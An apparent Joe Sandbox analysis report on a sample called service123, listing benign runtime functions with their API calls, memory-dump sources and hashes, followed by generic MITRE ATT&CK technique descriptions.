Function 6C355DB0 Relevance: 5.4, APIs: 4, Instructions: 369stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C355DEA
wcslen.MSVCRT ref: 6C355E7C
wcslen.MSVCRT ref: 6C355F0E
strlen.MSVCRT ref: 6C355FA0

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: wcslen$strlen
String ID:
API String ID: 1625065929-0
Opcode ID: e52fe0f13e3d5d54e9e31f584cac6e507c076e8c0cf319355d409a6b44852e95
Instruction ID: b55d61f087b25b628c6561800dc6556c993e93c5c8bac7a0f007095badf71c26
Opcode Fuzzy Hash: e52fe0f13e3d5d54e9e31f584cac6e507c076e8c0cf319355d409a6b44852e95
Instruction Fuzzy Hash: C2F16AB0A056068FCB00DF6CC0849AEFBF0BF88314B518A29E895DB754E735E955CF82

Function 6C3555D0 Relevance: 5.4, APIs: 4, Instructions: 369stringCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C35560A
wcslen.MSVCRT ref: 6C35569C
wcslen.MSVCRT ref: 6C35572E
strlen.MSVCRT ref: 6C3557C0

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: wcslen$strlen
String ID:
API String ID: 1625065929-0
Opcode ID: 6711a2b0f800688beb4213bb9d384e5184f00f3e096dce7e65f7cad5f838206a
Instruction ID: 8d8c8ae018be40720e7c02a3e1f243f2ec630ec8127a243a89b5bf4827bac8e1
Opcode Fuzzy Hash: 6711a2b0f800688beb4213bb9d384e5184f00f3e096dce7e65f7cad5f838206a
Instruction Fuzzy Hash: E4F12AB4A056068FCB00DF6CC0849AEFBF0BF88314B918A69E895DB754E735E955CF81

Function 6C2D3080 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C2D3101

Strings

NaN, xrefs: 6C2D3081

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: fputc
String ID: NaN
API String ID: 1992160199-1757892521
Opcode ID: 754b8ce3f8fa4690721228c4aee24319d66584de9428a45dc667d3d97db26e02
Instruction ID: 54389183ed36ae2d9cfd0f62336b575e5a2f08b6f9a211a14f3b1a96864a14ba
Opcode Fuzzy Hash: 754b8ce3f8fa4690721228c4aee24319d66584de9428a45dc667d3d97db26e02
Instruction Fuzzy Hash: 754118B1A0561A8BCB10CF1CC480785B7F1BF99705B2AC299EC488F74AD332EC46CB90

Function 006F29B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 006F2A31

Strings

NaN, xrefs: 006F29B1

Memory Dump Source

Source File: 00000004.00000002.2986711440.00000000006F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2986695055.00000000006F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986730093.00000000006FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986746804.00000000006FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986763434.0000000000701000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_service123.jbxd

Similarity

API ID: fputc
String ID: NaN
API String ID: 1992160199-1757892521
Opcode ID: 68ffc95d9e1d25a608f043cc23bf2ccf1fe7a9d213018a5cf932c0028062011a
Instruction ID: 486a445c2053254fb2a523325b23c803fb39e29cd5a76294be09c8398c0cb8cc
Opcode Fuzzy Hash: 68ffc95d9e1d25a608f043cc23bf2ccf1fe7a9d213018a5cf932c0028062011a
Instruction Fuzzy Hash: 0F410C7160521ACBDB24DF1DC4D47A6B7E2BF85710B298299DE488F35AD372DC428F90

Function 6C354DD0 Relevance: 5.4, APIs: 4, Instructions: 352stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C354E0A
strlen.MSVCRT ref: 6C354E8D
strlen.MSVCRT ref: 6C354F10
strlen.MSVCRT ref: 6C354F93

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: d5421b90bd3ac96208888eb61fa5d9541552317fa68d776c9f4a9392e83bc356
Instruction ID: db5377da3dbd1f70e92b06497638ea08b0789bb4c12c9708a0efd6eb0ab70ab9
Opcode Fuzzy Hash: d5421b90bd3ac96208888eb61fa5d9541552317fa68d776c9f4a9392e83bc356
Instruction Fuzzy Hash: 8AE14770A046098FCB00DFACC0C49AEFBF1AF49314B508669E855DBB54EB35E956CF91

Function 6C3545D0 Relevance: 5.4, APIs: 4, Instructions: 352stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C35460A
strlen.MSVCRT ref: 6C35468D
strlen.MSVCRT ref: 6C354710
strlen.MSVCRT ref: 6C354793

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: b8df78bed7186875cb4131130ea07d4331a10fd201e212a51f91d1fa347660f2
Instruction ID: ba1184b9de16edc90ca5598ce1bfe02f22741d388d6c4a150e2c92d6eb586cb8
Opcode Fuzzy Hash: b8df78bed7186875cb4131130ea07d4331a10fd201e212a51f91d1fa347660f2
Instruction Fuzzy Hash: 46E16874A046498FC704DFACC0C09AEFBF1AF49314B508669E895DB754EB35E926CF81

Function 6C2DE1F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89stringCOMMON

Download Yara Rule

APIs

strerror.MSVCRT ref: 6C2DE1FE
strlen.MSVCRT ref: 6C2DE211

Strings

basic_string: construction from null is not valid, xrefs: 6C2DE233

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: strerrorstrlen
String ID: basic_string: construction from null is not valid
API String ID: 960536887-2991274800
Opcode ID: ccfee879c38fcf46971cb34de678ccedc116c75c0d98ebea955d3d0d177c74fa
Instruction ID: 2b85b2580960d297cae4da123be8b5ae5fa19ebfe59a27bf3a6d16a39c578fc2
Opcode Fuzzy Hash: ccfee879c38fcf46971cb34de678ccedc116c75c0d98ebea955d3d0d177c74fa
Instruction Fuzzy Hash: F8115472A041408FC741FF7DC84549AB7F5AB9A214F45CA6DEC8987709E634D8198FE3

Function 6C2D3616 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C2D3567
fputc.MSVCRT ref: 6C2D35D7
memset.MSVCRT ref: 6C2D3692

Strings

o, xrefs: 6C2D362E

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: o
API String ID: 2944404495-252678980
Opcode ID: 70f9009819c30ed6982fd80218ea7a036d91aa79bbb5e6e144e921cc07d2ecdd
Instruction ID: 61d53cb9fc2bbdb0e305623f0c00a5b7da2cb2c59684a76872cd72415ba85d40
Opcode Fuzzy Hash: 70f9009819c30ed6982fd80218ea7a036d91aa79bbb5e6e144e921cc07d2ecdd
Instruction Fuzzy Hash: 47312572A1860A8FCB00CF68C180799BBF1BF5D355F168659ED89ABB41E734F905CB80

Function 006F2F46 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 006F2E97
fputc.MSVCRT ref: 006F2F07
memset.MSVCRT ref: 006F2FC2

Strings

o, xrefs: 006F2F5E

Memory Dump Source

Source File: 00000004.00000002.2986711440.00000000006F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2986695055.00000000006F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986730093.00000000006FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986746804.00000000006FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986763434.0000000000701000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_service123.jbxd

Similarity

API ID: fputc$memset
String ID: o
API String ID: 2944404495-252678980
Opcode ID: d1991d27a04d65bd7075c62f110e734cf744bc34d9a2ff6285541d999189f403
Instruction ID: 8fca572586ca5bf070d471bd851a0a8986abc014a2e3c5d03d0e5edc5cd91b4d
Opcode Fuzzy Hash: d1991d27a04d65bd7075c62f110e734cf744bc34d9a2ff6285541d999189f403
Instruction Fuzzy Hash: 72311A7190420ACFCB10CF68C1A47AAFBF2BF58340F258659DA899B705E734E941CF94

Function 6C2D3AF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 6C2D3A5F
fputc.MSVCRT ref: 6C2D3AC1

Strings

@, xrefs: 6C2D3AFA

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: fputc
String ID: @
API String ID: 1992160199-2766056989
Opcode ID: 4ceeb5be7b06ab83894e5669f94d5ac76a8e9207d24777a966ec28ddf3749335
Instruction ID: d38c16b668686dd5e0f096e84ae2171f4f07fa2788931d6d448d922fe54bd2bc
Opcode Fuzzy Hash: 4ceeb5be7b06ab83894e5669f94d5ac76a8e9207d24777a966ec28ddf3749335
Instruction Fuzzy Hash: B7110AB2B152198BCB00DF28C1807897BB1BF65305F2696D9ED996FB4AD334F801CB44

Function 006F3424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 006F338F
fputc.MSVCRT ref: 006F33F1

Strings

@, xrefs: 006F342A

Memory Dump Source

Source File: 00000004.00000002.2986711440.00000000006F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2986695055.00000000006F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986730093.00000000006FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986746804.00000000006FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986763434.0000000000701000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_service123.jbxd

Similarity

API ID: fputc
String ID: @
API String ID: 1992160199-2766056989
Opcode ID: 0837171a8a86bca28f46350b1f324809a3657fdd6de56afd08bfd6ae8b32df6d
Instruction ID: 4d9e0869b23a6742583b9acf8b6dfebfd16a205012978ebb700c7390150cc8e0
Opcode Fuzzy Hash: 0837171a8a86bca28f46350b1f324809a3657fdd6de56afd08bfd6ae8b32df6d
Instruction Fuzzy Hash: 08110AB2A046688BCB15CF28C1847B97BE3BF45700F258599DE899F34ADB35ED01CB54

Function 006F18B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 006F191E

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 006F18FF
Unknown error, xrefs: 006F18B2

Memory Dump Source

Source File: 00000004.00000002.2986711440.00000000006F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2986695055.00000000006F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986730093.00000000006FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986746804.00000000006FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986763434.0000000000701000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_service123.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: d1c0578768b6de1a7c8c6123b78d17bcb63c28cd4f2ed364016eb36f7ecc7448
Instruction ID: 696d96dea77f1be73842ebff42e0bffc18b14a644fcf6183164e7dca595670e2
Opcode Fuzzy Hash: d1c0578768b6de1a7c8c6123b78d17bcb63c28cd4f2ed364016eb36f7ecc7448
Instruction Fuzzy Hash: C101DAB0508745CBD340AF15E48842ABFF2FF89350F464C9CE5C846265CB32D868C747

Function 6C2D8080 Relevance: 5.1, APIs: 4, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,00000002,?,6C2D81A1), ref: 6C2D80A7
InitializeCriticalSection.KERNEL32(?,?,00000002,?,6C2D81A1), ref: 6C2D80E4
InitializeCriticalSection.KERNEL32(?,?,?,00000002,?,6C2D81A1), ref: 6C2D80F0
EnterCriticalSection.KERNEL32(?,?,00000002,?,6C2D81A1), ref: 6C2D8118

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: CriticalSection$Initialize$EnterSleep
String ID:
API String ID: 1117354567-0
Opcode ID: cd360d6e068e6bdb5430a9ea33f684a83940a4b1793c6ffadf127febc28b943a
Instruction ID: bd10a926340b749f917dfce3c923d8efd0e84765224b3b6f580f1be3c5e68191
Opcode Fuzzy Hash: cd360d6e068e6bdb5430a9ea33f684a83940a4b1793c6ffadf127febc28b943a
Instruction Fuzzy Hash: C3118EB160620A8ADF50BB6CA48225A77B8AB1B315F631927D842C7601E631F488CBD3

Function 006F6B60 Relevance: 5.1, APIs: 4, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?,?,?,?,006F6C81,?,?,?,?,?,?,00000000,006F4F24), ref: 006F6B87
InitializeCriticalSection.KERNEL32(?,?,?,?,006F6C81,?,?,?,?,?,?,00000000,006F4F24), ref: 006F6BC4
InitializeCriticalSection.KERNEL32(?,?,?,?,?,006F6C81,?,?,?,?,?,?,00000000,006F4F24), ref: 006F6BD0
EnterCriticalSection.KERNEL32(?,?,?,?,006F6C81,?,?,?,?,?,?,00000000,006F4F24), ref: 006F6BF8

Memory Dump Source

Source File: 00000004.00000002.2986711440.00000000006F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2986695055.00000000006F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986730093.00000000006FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986746804.00000000006FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986763434.0000000000701000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_service123.jbxd

Similarity

API ID: CriticalSection$Initialize$EnterSleep
String ID:
API String ID: 1117354567-0
Opcode ID: 65f26a3bebb731d706dc39b71620ece65f229db1a9f8e1afe1fd31206b22918b
Instruction ID: a579b172df271dcf91cef5e2751b348da08453f135e309593ea26033092862ea
Opcode Fuzzy Hash: 65f26a3bebb731d706dc39b71620ece65f229db1a9f8e1afe1fd31206b22918b
Instruction Fuzzy Hash: 5D1144B15081088ADB10BB3DE9CA1BA7BE7EB11344F151965E682C7324E731F8A4C79B

Function 6C2CAB50 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 6C2CAB5E
TlsGetValue.KERNEL32 ref: 6C2CAB85
GetLastError.KERNEL32 ref: 6C2CAB8C
LeaveCriticalSection.KERNEL32 ref: 6C2CABAC

Memory Dump Source

Source File: 00000004.00000002.2986905468.000000006C2C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2C0000, based on PE: true

Associated: 00000004.00000002.2986888491.000000006C2C0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2986983532.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987002063.000000006C39F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987037447.000000006C3E8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987056706.000000006C3E9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2987073750.000000006C3EC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2c0000_service123.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: 157b4e64be2027393d03e9d5d4dc841826e9cb79de7d261d48a139723eeb3bd3
Instruction ID: 638f3655c42c2e93ab8309bd6e685f368c01aaad713e8f1984f978f3fca91be1
Opcode Fuzzy Hash: 157b4e64be2027393d03e9d5d4dc841826e9cb79de7d261d48a139723eeb3bd3
Instruction Fuzzy Hash: 61F028B2B0031ACFCF60BFB8D4C558A3B78EF5A264B050269EE4447705D630E809CBA3

Function 006F2000 Relevance: 5.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,006F21D3,?,?,?,?,?,006F17E8), ref: 006F200E
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,006F21D3,?,?,?,?,?,006F17E8), ref: 006F2035
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,006F21D3,?,?,?,?,?,006F17E8), ref: 006F203C
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,006F21D3,?,?,?,?,?,006F17E8), ref: 006F205C

Memory Dump Source

Source File: 00000004.00000002.2986711440.00000000006F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2986695055.00000000006F0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986730093.00000000006FA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986746804.00000000006FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2986763434.0000000000701000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_service123.jbxd

Similarity

API ID: CriticalSection$EnterErrorLastLeaveValue
String ID:
API String ID: 682475483-0
Opcode ID: d4b52f28852dce5acdd6f36d49b431c96f73599492795eff141e00f022e9ffc7
Instruction ID: d91129bcd4257c15dd5e3ee063656eb2899155cea8883af6746d14a943956c78
Opcode Fuzzy Hash: d4b52f28852dce5acdd6f36d49b431c96f73599492795eff141e00f022e9ffc7
Instruction Fuzzy Hash: 0FF0A4765003058FDB10BF79D88453A7FA6FA14740F050428DE4487324DB31E806CBA7

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

